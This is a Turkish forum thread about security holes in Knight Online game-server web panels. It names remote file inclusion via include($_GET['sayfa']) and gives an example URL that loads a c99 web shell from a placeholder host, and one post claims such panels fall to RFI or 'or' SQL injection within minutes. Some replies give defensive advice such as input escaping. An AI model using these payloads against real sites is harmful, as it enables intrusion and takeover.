Kopanel Açıkları

• Konbuyu başlatan Konbuyu başlatan TaSo
  • Başlangıç tarihi Başlangıç tarihi
Cevap: Kopanel Açıkları

Include($_GET["sayfa"]); RFİ genel acik veren kod budur arkada$ım .

Mesala Bu Kod kayit.php de geciyorsa ;

site.com/kayit.php?sayfa=http://shelladresi.com/c99.txt? şeklinde caqırabiLiyor .

Egerki dosyalarinda 777 ise direk hacklerler , bu işlerle baya ugraşdim inş yardimci olmusumdur.

ki bunun host güvenligi var eger hostun safe mode off ise baska sitelere sokulan shellerden dizin okunarak senin sitenede erisim saglanabiliyor . dikkatli olmaniz dilegiyle.

Include($_GET["sayfa"]); RFİ genel acik veren kod budur arkada$ım .

Mesala Bu Kod kayit.php de geciyorsa ;

site.com/kayit.php?sayfa=http://shelladresi.com/c99.txt? şeklinde caqırabiLiyor .

Egerki dosyalarinda 777 ise direk hacklerler , bu işlerle baya ugraşdim inş yardimci olmusumdur.

ki bunun host güvenligi var eger hostun safe mode off ise baska sitelere sokulan shellerden dizin okunarak senin sitenede erisim saglanabiliyor . dikkatli olmaniz dilegiyle.

hiç bişey anlamadım desem :s

aslında ss li cevaplama yöntemi en etkilisidir bi zahmet öyle cevaplasak :D

valla kardeş en güvenli kopanel yapmak istiyorsan admin gm yetkileri olmucak kopanelde login olmucak bide indexte ip ban kodu olucak kıssacası ping veya saldırınca direk ip ban atıcak onuda bi not defterine kaydediyor hangi ipten saldırdıklarını

Ko panelde login girişi, admin paneli veya gm paneli olması açık var anlamına gelmez.Tek açık texbox lardan gelen verinin filtrelenmemesidir.POST metoduyla gelen bütün isteklerin bir süzgeçden geçirilmesi yani escape edilerek zararsız hale getirilmesi bu açıkları rahatlıkla kapatır.Bu konu hakkında yardım isteyen olursa yardım edebilirim.İyi forumlar.

panel hacklemek için injectiona gerek yok
eğer login.php varsa RFI ile 5 dakika içinde hacklersiniz hiç sorun olmaz.
RFI dan çakmıyosanız 'or' gibi 50 tane kod denersiniz gene hacklersiniz.
Login.php kayit.php kapalıysa injectionla bumlatırsınız.Tabi bu hacklemek sayılmaz.En fazla kendi charınızı gm,edit yaparsınız falan.İşte Queryde yaratabildiğiniz en yaratıcı kodu kendi charınıza uygulayabilirsiniz.Ötesi yok karşı bilgisayarı ele geçiremezsiniz.
:D

Geri
Üst Alt